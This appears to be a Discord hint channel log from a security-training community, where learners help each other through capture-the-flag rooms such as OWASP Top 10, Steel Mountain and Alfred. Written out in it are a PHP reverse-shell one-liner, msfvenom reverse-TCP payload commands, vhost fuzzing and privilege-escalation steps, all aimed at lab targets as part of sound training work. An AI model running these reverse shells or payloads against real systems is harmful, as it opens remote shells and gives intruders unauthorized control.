#room-hints

Its a private room from my workplace to train

Best not to ask about it here then

Because not only can we not help you, but usually those are meant to be completed individually

Oh okay

I'll keep that in mind

hello
i am doing a room Hashing - Crypto 101
i am on task 3 question 2 i tried the hash in several website though i was not able to crack it some web site said the charset is not valid can i get a hint

not sure if it would help but did you try the !crack bot command for it?

nope it was mentioned to use online tools

there

that is online I would say

in the bee sec server right

bot commands here, but you could also try hashes.com perhaps

not really sure how to give a hint about o.o

maybe open the first 10 links google gives you searching for hash cracking and put it into each ;D

lol i did it thanks

Gave +1 Rep to @silver otter

hello guys, i would like somebody to guide me

i am doing Rick`s CTF challenge

i found some information but, i stacked

@hollow spindle Just type your question. What do you want to ask, where are you stuck at? Share some screenshots for better clarification.

I found a Username, an /assets directory, open ports 22/80, and a sha256 code which i decoded with base64 and found a word "smow" (dont even know if its useful)

used the burp tool but couldnt find anything useful

Make sure to ||view source code|| of every webpage
Also might try|| gobuster!||

I'm working on "Upload Vulernabilities" task 11, file upload vulnerabilities.
I figured out how to bypass all of the client-side validation, but in order to do so, ||I had to prepend the node reverse shell script with ÿØÿ||. When I am able to access that, the response says that it could not be displayed because there are errors and I also don't ||get a connection with my nc listener||. Does anyone know if I'm missing something here?

nvm I think I figured it out 🙂

A very useful option that should not be ignored:

How would you tell nmap to scan all ports?

Im stuck with that question

-p- solved

nice one 😄

stuck in https://tryhackme.com/room/somesint task 4 question 1

I'm kind of confused

Hey, I am currently in the OWASP top 10 room at task 29, regarding the CSE Bookstore

So I used searchsploit and found three exploits

I could also login as admin using the Authentication bypass

but the question asks about characters in /etc/passwd

Now I am a bit stuck.. How would I be able to get there?

Maybe over an cross site scripting reverse shell using the first exploit listed when one searches for "cse bookstore"?

--script=vuln

need hints for the ISO27001 room stuck at task3 question 1 what should i be researching for CETS No 185 could be a example of what? also stuck on task 5 question 2 What is the name of the "Operations security" i talking about an. any clear suggestions would be greatly appreciated

for task 3 q 1, look at the areas discussed in the topic and combine with a little Googling you should be able to find it

for task 5 q 2 look at the 3 types and see how it best fits

Need help with OSQUERY room: One of the users performed a 'Binary Padding' attack. What was the target file in the attack?

3 typs of what though?

parts of the table

thanks

Gave +1 Rep to @glacial gust

np

Hello fellow nerds

😁

Anyone there?

Best to ask your question directly, then people can respond if they can answer

I need help with "Relevant" room

That's not exactly directly.
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Hey guys. Could I have an hint on Coctus stories? I'm at the C.A.T. page

Year of the fox: Got the rascal's credentials and logged into the site, but couldn't find a way to get lfi or the webflag... any hints?

I did tried to de-obfuscate js, but that didn't reveal much other than || a search.php with a post request in json format using the key 'target' ||

am I missing something?

Ok so I don't know how?? But when I typed in burp (out of frustration) "What to look for?" It returned 3 files?? Can anybody explain me this?

Any hints... On how to access those files?

Try a few different payloads and observe the behavior.

I tried many || php reverse shell || but none of them worked

Try some normal ||reverse shell payloads|| and see if anything works.

Anyone managed to input the serv2 flag on Hacker101?

@sudden shoal run showmount on the nfs share

make sure it's the /var directory

@sudden shoal Run the VPN directly in Kali, not on the host OS.

ahhhh

dumb mistake

thanks both of you

lol

ill delete my qs. in general sorry about that

Guys i dont see payload encoding option

from task 9 of burp suit please do let me know

What does the task says to do?

it says to uncheck the url encoding from payload encoding options

but the payload encoding options isn't available

@bold lichen

Go to Intruder -> Payloads, then at the very bottom you will find the option.

Hello everyone! I'm fairly new here and was hoping for some help on Network Services - Task 4. Maybe I've been on this too long and can't think of it, but how do I find the username of the account?

thanks weird wasnt able to check it in the attack box

Gave +1 Rep to @halcyon sequoia

Heya, there's a file which contains the username.

Please tell which question and what part are you stuck on?
Screenshots helps a lot!

Sorry about that! It's this part here at the end where it states using the info you've gathered to find the username.

Man I guess I really did just miss something smaller... I'll take another look. Thank you!

Gave +1 Rep to @tight fulcrum

Cool!

You found a interesting txt file on smb. Hint: ssh username is 6 chars long

I am trying a burpsuite intruder attack on Juice Shop to bruteforce the admins password. It takes forever though, it seems wrong. Is it supposed to take ages?

Only in the Community Version...

Okay so its supposed to be like that? Was thinking maybe i got something wrong

Unfortunately, not necessarily

The community version is throttled

allright I'll just wait and see

In the Juice Shop it should be possible to finish in this life 😉

thats nice encouragement!

De nada. I do what I can..

Hello everyone
I want to ask that can we use linpeas or winpeas in oscp exam

#general would have been better but yes they are able to be used in the exam

how can I enumerate subdomains in nahamstore? I tried gobuster vhost, but it returns 200 for every subdomain in wordlist

That's the right root word

Not SUPER familiar with gobuster, but you can try fuzzing with ffuf and filtering by response size or word count…just to see if anything comes back.

you can use ffuf

something like this

ffuf -w subdomains.txt -u http://website.com/ -H “Host: FUZZ.website.com”

doing this you will get a lot of false results and then you need to filter it with -fw

ffuf -w subdomains.txt -u http://website.com/ -H “Host: FUZZ.website.com” -fw 349

It's a word, based on the one you've already got that describes a protective layer, usually in a cable. Or another way of looking at it is think of that object as a verb rather than a thing.

Have a look at the Setup task, you need to complete your subdomain enumeration against the nahamstore.com domain.

you pretty much have it

Of course filtering by response size, idk why i havent thought of that thanks!

Gave +1 Rep to @short fox

thank you

np

Gave +1 Rep to @candid nimbus

Gave +1 Rep to @candid nimbus

it's really silly once you get it

Yup. A lot of people, myself included have spent time puzzling on that! Do you know if anyone has actually found that word being used to describe that thing outside this question?

yes

but it's obvious to a native english speaker

a bit less so to non-native speakers

it's an object that verbs

.<

same concept really

Can anyone give me hint on recon nahamstore

hi

why i can't join voice

You have to verify

!docs verify

Hello I'm looking for a hint for Osquery room, Task 9, Question 2: "There is another security agent on the Windows Endpoint. What is the name of this agent?"
I've tried loads of different queries to different tables like win_services, win_event_log_data, osquery_registry, etc but cant for the life of me figure out what the answer is.

Keep plugging at those tables. Maybe something more program-like?

Hi all, I'm not sure if I'm overlooking the obvious or if it's just been a bit too long since I did the other rooms required to complete it, but I can't seem to find where to start in Investigating Windows 3. I've done the quick run throughs of event viewer, registry keys, even ran a quick scan, but just can't seem to find where to start. Can I get a hint on where to go first?

room - yara
task10
1st que

What have you tried so far?

I want to ask, I learned linux fundamentals first part. in task 9 why is there a shiba2 password even though I only created a nootnoot.txt file

The binary is a program that checks that you created the text file

If you created the text file, it gives you the password when you run the binary

does it apply to all linux or only the os on the web?

Just the machine for this room

Hello all! I'm currently doing the Network Services room and I have successfully used mget to snag the id_rsa and id_rsa.pub files to the default/home directory in the AttackBox Machine but have been struggling to successfully move them into the /.ssh directory. I suspect I'm messing up the syntax on the "mv" command but I can't seem to figure out what I'm doing, any thoughts?

doing incorrectly*

You don't need em in .ssh

You don't need the public key either

hmm okay, I'll see what I can do with this new information, thanks!

Hi all, anybody willing to give a nudge on the room "CmesS", did extensive enum, identified 2 possible exploits. Can't get them to work.

Apparently not

what 2 exploits did you try

'query' SQL Injection
Remote Code Execution (Unauthenticated)

Not sure if I can put spoilers here 😛 ?

You can use spoiler tags in discord.
We'd prefer it if you didn't spoil things for no reason, but obviously if you're asking for a hint then you have to be able to tell us what you've tried/found etc

Hey all.
I've a question regarding Alfred room. I'm trying to get a meterpreter shell for the room. but it is stuck here. Meterpreter session 1 opened (10.x.x.x:44 -> 10.10.46.188:49258) at 2021-05-11 23:59:31 +0530

nevermind. I got the shell.
Thanks y'all.

alright, well if you searchsploit the service there's only two exploits that make sense, and they are both based on a certain query language.

I tried both manual and changing those exploits but can't get them to work.

Hi guys? Room Steel Mountain: from msfconsole getting this:
Any ideas?

LHOST is incorrect

Needs to be your tun0 IP

Also IDK why you redacted that

Damn. Missed it. Thanks

Gave +1 Rep to @astral smelt

In Room HTTP in detail in Making Requests task. First flag which required Make a GET request to /room. In response when send a GET request to /room shows incorrect flag which wasn't accepted. There are missing 'E chars. (sorry for language wrongs)

It should be fixed now

🤙

Its written in the website itself still it says the answer is wrong

Room:MITRE

Task 7

could you send the URL you were looking at? the answer is on this page https://attack.mitre.org/techniques/T1078/004/

ok thanks

I just had to replace them according to the chars shown

👍

currently struggling with osquery task 8 😦

i read your hint but still having trouble. can you give a more narrow hint?

What have you tried so far?
@gusty turtle yara 1ndex.php files/file2.yar

What type of material can be used to go over the door to grab the secure side handles when an under the door tool is not able to be used?

can someone help me with this

It is used in old cameras. TheNotSoCivilEngr has a video related to that.

Thank you so much!

Are you sure that file path exists?

There's a table for programs that's worth looking at. Also worth checking out the THM Intro to ISAC box if you're having trouble recognising which one it is

still having trouble...i thought it might have been services but no luck. still looking through the tables though

Just to be clear, you don't need the plugin for this bit. The table is listed in the schema you used in part 4. If you're looking at services, you're too far down.

we are referring to windows security endpoint. i'm on the osquery schema list now. should i be choosing version 4.8.0?

thnx

Just follow the link in part 4. 4.7.0 is fine though I doubt it makes a huge difference. I've already mentioned the name of the table. Begins with 'p' and ends with 'rograms'.

Hi guys. Steel Mountain room. Getting this:

C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9

[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.63.157
sc start AdvancedSystemCareService9
[-] Command shell session 2 is not valid and will be closed
[*] 10.10.63.157 - Command shell session 2 closed.
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

Any ideas?

Is it something with x86 payload/exploit ?

Tried this

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.5.185 LPORT=4443 - e x86/shikata_ga_nai -f exe -o Advanced.exe

try -f exe-service

Basically windows expects services to tell Windows that they started up properly otherwise it kills them.
-f exe-service generates a binary that tells windows it started up properly

nvmd solved it another way. Thanks

hi guys how can i get the windows privesc badge?

i have completed the windows privesc room but it doesn't give me the badge

You need to complete this one https://tryhackme.com/room/windowsprivescarena

thank you so much!

Got it. I was looking at programs but what was throwing me off is the answer format for the security agent quesrion is a 10 letter word and a 5 letter word. I may have skipped over it because i was so focused on finding a name that matched the answer format

Hey guys, Im new here

One question

I have no knowledge of this. Can I learn from the site?

read #start-here

there is a link to free path for beginners. You should read that

Happens. Glad you got there!

ended up getting it! Thanks for all the tips! 🙂

Gave +1 Rep to @candid nimbus

Hi guys,

I'm in Alfred room and trying to create msfvenom payload.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<IP> LPORT=<port> -f exe -o reverseshellAlfred.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Error: Input/output error @ io_write - reverseshellAlfred.exe

Do you know what this error mean?

Ok I created payload in mounted drive. When creating on local disk everything is fine.

Hi I'm in the Network services room, task 4. I have the id_rsa file and tried ssh -i id_rsa johncactus@IP but it just says Connection closed by IP port 22. Any hint of what I'm doing incorrectly would be appreciated.

That's the wrong username

SSH will close the connection like that immediately if you have a valid key but a wrong username, usually.

Ah thanks

Hi all, I'm in Investigating Windows 3.x. Can someone give me a hint for "This is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable?"

I read the forum post hints, but am still stuck. I have attack framework and I think I know variable but I'm not getting the correct answer

Edit I got the answer, it doesn't match at all with character length. Thanks!

I am doing dogcat room and i have got root and got the 3rd flag which was in root directory

There is also a 4th flag but i have no hint for it

I tried finding it using find command but couldn't find it

dogcat is hard

I have root shell rn

It doesn't evem have hint for 4th flag

How can I find the CIDR range of IP address having "172.16.x.x" and a Netmask of "255.255.0.0"?

I read a bit about Netmask and I understand the usage for it but not how to calculate it...

The CIDR notation is network ip/prefix size

The prefix size tells you how many bits belong to the Network part rather than the host part

So like, 192.168.0.0/24 would be 192.168.0.x with a netmask of 255.255.255.0

How do I get that by my self?

https://www.digitalocean.com/community/tutorials/understanding-ip-addresses-subnets-and-cidr-notation-for-networking this might help?

I'll try to read that for a sec.

I understood the concept of dividing networks, but I still didn't get how to calculate it by myself, I found a calculator for it online which satisfaies it for now... but I still want to understand it... if any of you can, it would be great if you can explain...

Ok, so an IP address can be split into two parts

There's the host part and the network part. Not in that order, annoyingly

The network part is the same for all hosts on the network, the host part is what changes

For slash notation, the number tells you the number of bits for the network part.

The subnet mask is a 1 for each bit that belongs to the network part rather than the host part. It helps you write the addresses out in binary here.

The way I learned it/like to think of it: each octet is 8 bits/1 byte. So the entire address is 32 bits/4 bytes. The number after the / is how many bits are "reserved" for the network, starting from left to right. Anything to the right of that is allowed to change.

So a 192.168.0.0./24 means those first 24 bits (first three octets) much remain the same. The last 8 bits can change. And then the number of available addresses is 2^(32-n), where n is the number after the /

so a x.x.x.x/32 defines a single address: 2^(32-32) = 2^0 = 1

while a x.x.x.x/16 is 65536: 2^(32-16) = 2^16

If you're comfortable with binary, sometimes it makes more sense to look at it from that perspective. But it's also fairly simple to just calculate the number of addresses, and then your range is the first address specified, plus that number. Although I think there's a little bit of strangeness there I don't quite understand when it doesn't match on a nice/neat boundary.

(that's when the address specified isn't the "starting" address, and is within the actual block)

@stuck fractal dosn't the CIDR notation represent the usable IP Addresses of a certain Network?

Indirectly yes

There is anyone , who has completed Mitre room. A hint for the following question, will be much appreciate:
Task 6 ATT&CK® Emulation Plans

Examining APT29, what 2 tools were used to execute the first scenario?
What tool was used to execute the second scenario?
Where can you find step-by-step instructions to execute both scenarios? Task 7 ATT&CK® and Threat Intelligence Per the detection tip, what should you be detecting?
What platforms does this affect? All my answers seem to be wrong.

Hi guys, I'm stuck on Burp Suite - Sequencer Let Sequencer run and collect ~10,000 requests. Once it hits roughly that amount hit 'Pause' and then 'Analyze now': I've paused it but for some reason the analyze now button is still grey, not clickable. Any advice?

hello everyone, i'm stuck on PrivEsc room task 4. It says that i have to edit the hashes of root user with my own created hashes (which i managed to create). However, i have no idea how to replace the hashes of the root with my new hashes. Does vi works? In need of some advice

Heya if you're still stuck: you can use any editor you like for example vim/nano

@tight fulcrum thanks for the suggestion. figured i missed the full stop at the end of the hashes which causing it to not works. Thanks for the help again 🙂

Gave +1 Rep to @tight fulcrum

guys i know i have cracked the hash but idk where the hash is

can someone help me

What do you mean by "where the hash is"?

The hash is in /home/kali/Desktop/hash1.txt

no

i mean the cracked of hash1.txt

the cracked value of hash

It was printed to the console, but you can also use --show

when i use --show it through the command command not found

Screenshots.

because if it's saying that, then you're doing it wrong

--show is not a command in itself

you would use john hashfile --show
Replacing hashfile as appropriate.

i am not understanding sorry

run john <your hash file > --show that's what he's saying

Without the angle brackets

see @stuck fractal and @tight fulcrum

Remove all the other flags.

You will notice that the commands we said didn't have any of those other flags

oh yes

and i get this

Why are you trying to crack it again, in the screenshot you sent, it showed the password.

They are not

They're trying to retrieve the hash from the pot file

where did it show the password

Look under where it tells you it can abort the connection

...connection?

There's no connection

Please don't post answers tho

sorry

thanks

Gave +1 Rep to @thorn heart

thanks

thanks

Can someone help me? I'm doing the room about nmap.
I need to perform an Xmas can on the first 999 ports of the target, and say how many or open or filtered. I wanted to do

sudo nmap -Pn -sX -p 1-999 <ip-address>

but for some reason I still get the answer 0... when it's supposed to be 999, and I don't get why

It's fine for me to send a screenshot containing the IP address of the machine?

okay now it doesn't give me the answer quickly it just "hangs" (probebly still in the proccess but in the answer that I ended up opening thinking I was a dumb dumb it tool 0.01s, and in mine i'm waiting for a few minutes now

if i remember correctly they should all be filtered???

Working on the OWASP Top 10 module and I'm stuck on task 7. >_>

I keep getting the main page when I try registering the " darren" username

Don't include the quotes @vivid crow

I've tried both ways. First time without.

Never mind, I figured out where my hang up was.

Any hint on how to get a foothold in VulnNet: Roasted?

hello i am doing skynet and i have found the ||smb password in the email|| but its not letting me into the ||share|| for some reason (i am making very sure i enter every character correctly since the string is weird)

ive tried using tools like medusa to bruteforce it with a wordlist of 1 on both user and password

just to make sure im not typing it incorrectly

and it says unknown error when i do it

nvm i figured it out please ignore

can you ls in LFI?

within the URL

I got access to certain SMB shares through smbclient, but not sure what to do after that

what should i do on "Task 1 Starting your machine"?

@rigid leaf the box wants you to upgrade it to a meterpreter shell

it has some stuff you need for the next questions

but iirc you should already be in one since its attached to the eternalblue exploit

It's the default. It's not attached.

The exploit is used to deliver a payload. You can change what payload is delivered.

right

There's no inherent connection between eternalblue and a meterpreter aside from meterpreter being the default payload here.

Hey peeps, I am not able to figure out what type of encosing this is -> MJQXGZJTGIQGS4ZAON2XAZLSEBRW63LNN5XCA2LOEBBVIRRHOM======

It's not base 64

it's part of the room -> c4ptur3-th3-fl4g

I have solved rest all questions, but this one's irritating me.

Can anyone help?

@peak harness base64 is not the only encoding

look at other base

yep i know, but I don't even know what exactly should I gogole

ok, i'll search for that.

I recommend using cyberchef

https://gchq.github.io/CyberChef/

it was base 32, thank for sharing this 🙂

👌

happy to help

I just rooted the box. There are 2 ways on how to get the right 'user'. I had to do it the hard way because I didn't know about the other way before. LOL. Basically, I created a list, based on the clues in the readable shares.

Did you use impacket?

Yes. But first, I used the list I created for enumeration. I used another tool. Related to the name of the box 'Roasted'

Hey, I'm working on OWASP Top 10, on task 11. I'm suppose to find a db file in /assets but there is just two scripts. Is there a different spot I'm suppose to look or am I just missing something?

I used kerbrute first.

Link the room please. I did this a while back, I don't remember it well

https://tryhackme.com/room/owasptop10

👍 thanks a bunch man

Gave +1 Rep to @pallid trellis

I'll try it tomorrow

Read the link below and verify with the bot, then post a screenshot of the directory and its contents

!docs verify

Hi, i'm working on OWASP Top 10's first box, and I cannot execute a php reverse shell for some reason, am I doing something wrong?

Probably :). Let's figure out what

This is task5- command injection?

Yes, it is

the reverse shell i'm trying to use is this: php -r '$sock=fsockopen("MYPrivateIP",9001);exec("/bin/bash <&3 >&3 2>&3");

Just so I'm understanding, creating a revshell here is not part of this task, right? You're doing extra?

Yes, i'm trying to get root

that might not even be possible for that box, I don't know.

oh, that could be why

General revshell debugging: make sure the ip is your tun0 IP, that you have a listener running on the correct port, that you're connected to the vpn, and that it's running in the kali vm and not the host OS, if you're using a vm.

For the specific shell command you wrote above, it's possible there's a problem there calling "php ..." within a php file. I don't know enough about php or the structure of those shells to know for sure

I'd also try simpler rev shells first

What does 3 stand for? I only know 0,1,2. Stdin,stdout, stderr

The 3 makes a file descriptor and 2 redirects to it

looks more like 2 is being redirected to 3

Again, simpler rev shells first

Ohhh. Nice.

Hey, I'm still stuck on this problem. Am I missing something obvious?

I'm sorry, I thought that screenshot was associated with what gellert asked. Clearly running on too little sleep

Okay, so I think the issue you're having, WillSloan, is that you need to go to http://site.com/assets/ in the web browser

the screenshot you posted doesn't tell me what page you're actually on

Ah yep, thanks

did that solve the issue?

Yes it did. Didn't realize you could just browse to the folder.

sometimes you can, sometimes not. Depends

in this case, the web server was (mis)configured to allow that

(Directory listing is often enabled by default)

Hello everyone 🙂

need help in wireshark room... the ip i found does not match the answer format..

Am i wrong ? Thx 🙂

It doesn't fit the format, so yes

Surely you want responses rather than requests?

thx 😉

Anyone know the vmem size of the memory forensic room

It shows the size is unknown

yea idk how to answer this

there is no specific date other than 2020 on there

wait really wtf

wtf is that extra character in the end there for

x.x

I call bull on that

I would google or wikipedia that

Must be answer tolerance if it accepted 4. Answer should be 4.2

https://en.m.wikipedia.org/wiki/Network_File_System

Hello ..... I need some instraction .. I searched on youtube and watched a lot videos on the topic but didn't understand how to solve the task........https://tryhackme.com/room/owasptop10 ............................. Task 16 Q: Where is falcon's SSH key located?... I copied the answer so that i can complete the task..... But What happed here ... How can i found Where is falcon's SSH key located? using xxe .... i used command "locate .ssh" insted of using file name but nothing happed I am a newbie.............Pls help me what payload i need to find out the .ssh file .... I am a n00b

https://media.discordapp.net/attachments/743858961593139361/843314379167891487/Screenshot_56.png?width=1120&height=630

locate .ssh probably wouldn't work, for two reasons: locate might not be installed, and .ssh is a directory

try locate id_rsa maybe

but also- think about it this way:

• We know the user's name (falcon)
• We know all users on linux systems tend to have a similar directory structure
• We know that ssh keys are typically stored in certain directories (...../.ssh/
  Combine those pieces of information to guide your search/guessing

Thanks dude

Gave +1 Rep to @worn otter

you're welcome 🙂

what ended up working?

Hi guys i got stuck in nmap task 12 second Question
so what should i do?

link the room please. I haven't done that one in a long time

How can i do this?

just paste the url of the room here so I can find it easier 🙂

Paste the link to the room here

ok

https://www.tryhackme.com/jr/furthernmap

this the link please help

what command have you tried?

@peak cypress I'll only be here for a few more minutes

i dont understand what a question is asking?

which question?

read through this script what does it depends on?

post a screenshot of the script

and the script is smb-os-discovery.nse

ok

no, post a screenshot of the contents of the script

ok

I think you are misunderstanding me

open the script in your favorite text editor, and read it

How can i see content in the terminal?

which command is used

sublime (subl) is a nice text editor but is not installed on kali by default

nano should be

ok i have nano

can i open in gedit?

if not, cat would work, but it might be a long file. you could use "more" or "less"

sure

any text editor

ok

the file should be something like /usr/share/nmap/scripts/smb-os-discovery.nse

ok

hey I got the ans thanks @worn otter for helping me i am searching since last two days. thanks again

Gave +1 Rep to @worn otter

you're welcome 🙂

Hi #room-hints,

Does anyone understand the OWASP Juice Shop - Download a Backup File!

I've downloaded the .md file using the null terminator, though it's expecting an answer?!?

plus how do I post a screenshot?!?!

You have to verify. Follow these steps and you get permissions

!docs verify

Thanks @tight fulcrum, I'm verify 👍

Gave +1 Rep to @tight fulcrum

Hi #room-hints I've downloaded the package.json.back using the following command and I see a JSON object file, though there's no THM flag. Furthermore, there's no question to support answer

Guidence anyone?

can u try without loggin in or with loggin

"If you want to exploit a 2020 buffer overflow in the sudo program, which CVE would you use?"

I've scooped the Exploit Database. Couldn't find

Google: "2020 sudo buffer overflow"

Ouu

Okay

Thanks

You can't give up after the first place you look

should quite literally be the first one anyway ;)

You need to keep looking and keep trying new searches

Yelp again

In Linux fundamentals part 2

Putty and SSH

I already have Linux as my Main OS

So you can use the command line SSH client

Do I need to install Putty on my PC?

No

Then?

@stuck fractal

I did say.

From where? My actual machine or from the AttackBox?

Either as long as your own machine is connected to the VPN

Nope

AttackBox is the way then

Can I get a nudge on PE for Relevant Room?

look at the output of getprivs

gotcha cheers

@wise kiln where do u find user directorys

in which directory

evilshell

/etc/passwd doesnt work this command

why

it aske "

How many non-root/non-service/non-daemon users are there?"

/etc/passwd is not a command

its a file

not a command

how to get those number?

Count

that list of .. huge list

Yeah, except only a few are not service accounts AND not daemons AND not root

bro did u count too?

Not your bro.

And yes, I counted. Because counting to a number less than 10 is easy enough.

hint - do u know a directory where u can see the users?

ls home ?

/home*

and try that once

will it shows root user too?

nope

Why don't you try it and see anyway?

i tried it

it doesnt work in evilshell

Screenshots

Show us what you're doing

ok

to see better the response open view the page source

Hi @cold oracle thank you for the reply. Yep, being logged out, then making a separate call via CURL showed the flag

Gave +1 Rep to @cold oracle

wlcm

+1 Rep @cold oracle

+1 Rep @worn otter

however this works 🙂

+rep <user>
@normal ermine

Gave +1 Rep to @normal ermine

The bot only lets you thank one person every 5-10 mins or so, to prevent abuse. What'd I do to deserve that 🙂

Gave +1 Rep to @normal ermine

What is the user's shell set as? what does this mean

there is a file which shows what each user's shell is set to

you need to figure out what that file is, and look inside it

file where in my user account folder?

google can help you find the name of that file 🙂

www-data❌33:33:www-data:/var/www:/usr/sbin/nologin

what does this mean?

www-data is my user id..right

No

i mean www-data is my logged in user ...right

cause i use command whoami

it shows www-data

Hi guys i started vulnversity room with nmap challenge and i have scanned my attackbox with nmap but it doesn't show any squid proxy and webserver

Should i scan some other ip? Or am I missing something? I browse some info about it in google and it should display the information in first nmap scanning with -sV flag which I tried, so my guess is I am just scanning wrong ip.

Yeah, you need to scan the target machine

Okay, yes now it is clear. Thank you.

usr/share/doc/*/copyright

what does that * mean?

it's a wildcard, can mean anything/everything

I performed a TCP SYN scan on the first 5000 ports of the target (10.10.75.164)-- there are no ports shown as open. The syntax I used was:

nmap -p 1-5000 -T4 -A -v -Pn 10.10.75.164

I'm far from an nmap expert, but try -sC -sV. Double check to see if the -A overrides that.

I'll try that thanks

you're welcome

nmap -sC <target> worked

great 🙂

Some rooms can take a while to boot up all the services, also. Some as much as 5-10 mins

that is probably what happened

hii

i found the secret dir on the ccpentest room

but idk which extentions to use

how do you choose?

I'm not sure if I've done that room, so I'd need more info

well

let me give you a discription then

link it. Which task? What have you tried?

https://tryhackme.com/room/ccpentesting

last task,number 24

i nmaped the room

found 2 services

apache web server and ssh

i checked the webserver

it was a default server

i gobusted the ip and found a /secret directory

the hint says you should use extentions on the secret directory

but idk which extentions to use

try gobuster with a -x txt

oh smart

how did you pick txt?

🤷‍♂️

I'm just looking at my notes from that room

you made notes??

It might have been my first guess, there might have been something there that was a hint

I always make notes

sometimes they don't mean much when I come back to them, but I try to always make notes on rooms I do 🙂

yo epic

i found a secret.txt

looks to be some kind of hash

let me go crack that brb

Can I get a nudge on PE for host Relevant? atm, I'm trying to escalate via SeImpersonatePriviliges, but JuicyPotato won't allow me to run and the binary gets deleted afterwards.. Something to do with AV probably? I would appreciate a nudge

Wish I could help, but I haven't done relevant, so I'd only be guessing.

No worries, mate. 🙂

okayyy

i got into the systtem

i think i got to get into root

whats a good priv esc technique?

you ssh'd in with ||n|| ?

there is a lot,do i just pick any

yeah

i cracked the hash

and it looked like a typical ssh creds

try ||sudo -l||

but you can also look around as your current user. I think there's a user flag there

i got the user flag

ah ok

oooo

it has root

and no password ;)

how do i exploit that

super easy

bruh

hold on

you don't need to do that

what was the output of the command I hinted at a minute ago?

root nopassword

in /bin/su

what does that tell you?

you dont need a password to super user to root?

to switch user

su is switch user

oh yeah

so

i just got to do

||su root||

no wait

that doesnt work

getting warmer

the (root) means you can sudo it

YE

I GOT THAT

IT CAME TO MIND

A SEC BEFORE YOU SAID THAT LOL

and su without an arg will infer root

bro i felt like i cheated though 😭

should have done my own googling

true. But those were easy ones

I just coaxed a little

yeah this is just the basics

maybe it should be less of a test rather more of a way to commit all this knowledge to memory

thank you so much bro i appreciate it

you're welcome

and yeah, I strongly encourage you to take notes as you go

all of this stuff comes up over and over again, so having a quick way to search that will be invaluable

can i see a sample of your notes please?

just to get an idea

I don't have them on this machine

oh i see

but basically, for THM rooms, I break it down by tasks, same as the rooms are, with big headers

like a walkthrough?

and then in each section, I paste in every command I run, and things I learn, my thoughts, outputs of commands, etc

do you document everything you do?

oh brilliant

every command I run that gets me somewhere, yes

sometimes not 100% of them. Like for example, I spnet 20 mins looking through directories earlier, didn't find anything interesting

so rather than paste 50 cd and ls and their outputs, I just wrote a note about it

smart

markdown notes or physical,paper notes?

cherrrytree

ohhh nicee

and then I also have separate folders/sections for things like privesc attacks, revshells, stabilizing shells, etc

eyyy thats cool

+rep @worn otter

Gave +1 Rep to @worn otter

Hey everyone, I have a question that if i am running a nmap scan in my VM that it says that <Host seems down. If it is really up, but blocking our ping probes, try -Pn>

if i run it in tryhackme attack box it ru successfully

so what to do because i am not a subscribed so i run attackbox only 1 hour per day

so can i do this through openvpn

if not then what to do?

you can connect to the vpn and do the same thing

you can use -Pn in the nmap command,

Been working on the Daily Bugle room for too long. I must be missing something obvious.
I've looked over several walkthroughs and can't seem to get sqlmap or the joomblah.py python script to dump the password hashes. Also, pet peeve - Task 1's answer is a different syntax to the answer in the web server.

This is what I get when I run joomblah.py

There's a fix for it pinned in #room-help I believe

I have John working on the password file for over an hour... Am I missing something ?

Room, task, question?

Agent-sudo
Any hints how to get the information from the photo? google dork and exiftool gave me nothing

which photo? there were lots lol

the first ones from ftp, "fake aliens"

||binwalk|| use the ||-e flag to extract||

thx

+rep @unborn canopy

Gave +1 Rep to @unborn canopy

Hey i am stuck somewhere can u help

Oh shit i can't send pic

class NetCat:
1 def init(self, args, buffer=None) :
self.args = args
self.buffer = buffer
2 self.socket = socket.socket (socket. AF_INET,
socket.SOCK_STREAM)
self.socket.setsockopt(socket. SOL_SOCKET,
socket.so_REUSEADDR, 1)
def run(self):
if self. args.listen:
3 self.listen()
else:
4 self.send()

Why we use args in this

What is the use of args

Your one help is equal to 1 bitcoin

args is used to determine if we want NetCat to listen (client) or send (remote)

any hints for room glitch im stuck on user.txt

Is this for a tryhackme room?

xpost from #room-help
#room-help message

Don't do this.

xposting?

Yeah. Ask in the appropriate channel and wait for a response. Don't ask the same thing over several channels.

i only asked it here and in #room-help friend 😄 .
mostly because i wasn't sure where to ask this.

Ok, but please listen to me. Don't do that. It's spammy.

sorry about that, could you please tell me where should i ask then?

If you want a hint, then #room-hints

That includes sanity checks and nudges in the correct direction

If you want more than that, #room-help

#room-hints seems like the perfect place to ask my question then!

Yes. The issue is the fact you asked it across multiple channels.

well i did tell you why i did that 🙂

Yes. And I am telling you not to do that, and you're arguing.

Just listen to what I'm saying because next time it will be more than just "please don't do this".

there seems to be a horrible misunderstanding, i'm not arguing with you, i'm simply sharing my side of the story with you friend

I didn't ask for your side.

I just asked you not to do it.

You can simply apologise and not do it again. That's all that needs to happen.

I am doing the inferno room and i got a rce exploit for it and u get my reverse shell back but it immediately exits itself with exit command, meaning its configured such way

Any hints to move further?

Top right terminal is where i get the shell and it automatically exits

@full panther That room is not public.

Having a bad day or something? you seem a little aggressive lol

First of all, not really your place to comment. Secondly, it was because I had to repeat myself a number of times.

https://tryhackme.com/room/owasptop10

right now i am solving Task 26 [Severity 8] Insecure Deserialization - Code Execution

I know python very well

But here why use command = "abcdxyz..........."

Hello

Is python some kind of a hacking website?

No.

Are there any hacking courses or some kind of a tutorial for beginners

Yes, check out #start-here

Dope

Yo ninja, https://blog.tryhackme.com/free_path/ this link has all the tutorials in it for beginners right?

Got it from #start-here

That's one resource yeah

So we can learn from this or is the premium one better

It's a good start.You might wanna subscribe to get more content

Best to try the free content first

If you get on with it, you can pay and get more content

OK, thx guys. Gonna go start tutorials now

Happy hacking

